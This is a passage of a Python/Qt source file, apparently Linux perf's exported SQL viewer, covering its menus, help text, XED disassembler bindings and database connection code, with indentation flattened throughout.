self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would be always 1, is replaced by the 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# PostqreSQL server version
def PostqreSQLServerVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT VERSION()")
if query.next():
v_str = query.value(0)
v_list = v_str.strip().split(" ")
if v_list[0] == "PostgreSQL" and v_list[2] == "on":
return v_list[1]
return v_str
return "Unknown"
# SQLite version
def SQLiteVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT sqlite_version()")
if query.next():
return query.value(0)
return "Unknown"
# About dialog
class AboutDialog(QDialog):
def __init__(self, glb, parent=None):
super(AboutDialog, self).__init__(parent)
self.setWindowTitle("About Exported SQL Viewer")
self.setMinimumWidth(300)
pyside_version = "1" if pyside_version_1 else "2"
text = "<pre>"
text += "Python version: " + sys.version.split(" ")[0] + "\n"
text += "PySide version: " + pyside_version + "\n"
text += "Qt version: " + qVersion() + "\n"
if glb.dbref.is_sqlite3:
text += "SQLite version: " + SQLiteVersion(glb.db) + "\n"
else:
text += "PostqreSQL version: " + PostqreSQLServerVersion(glb.db) + "\n"
text += "</pre>"
self.text = QTextBrowser()
self.text.setHtml(text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.text)
self.setLayout(self.vbox);
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))
def Try(self, fn):
win = self.mdi_area.activeSubWindow()
if win:
try:
fn(win.view)
except:
pass
def CopyToClipboard(self):
self.Try(CopyCellsToClipboardHdr)
def CopyToClipboardCSV(self):
self.Try(CopyCellsToClipboardCSV)
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
self.Try(ShrinkFont)
def EnlargeFont(self):
self.Try(EnlargeFont)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewSelectedBranchView(x), self))
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
def About(self):
dialog = AboutDialog(self.glb, self)
dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
if magic == chr(127) + "ELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
def Main():
if (len(sys.argv) < 2):
printerr("Usage is: exported-sql-viewer.py {<database name> | --help-only}");
raise Exception("Too few arguments")
dbname = sys.argv[1]
if dbname == "--help-only":
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.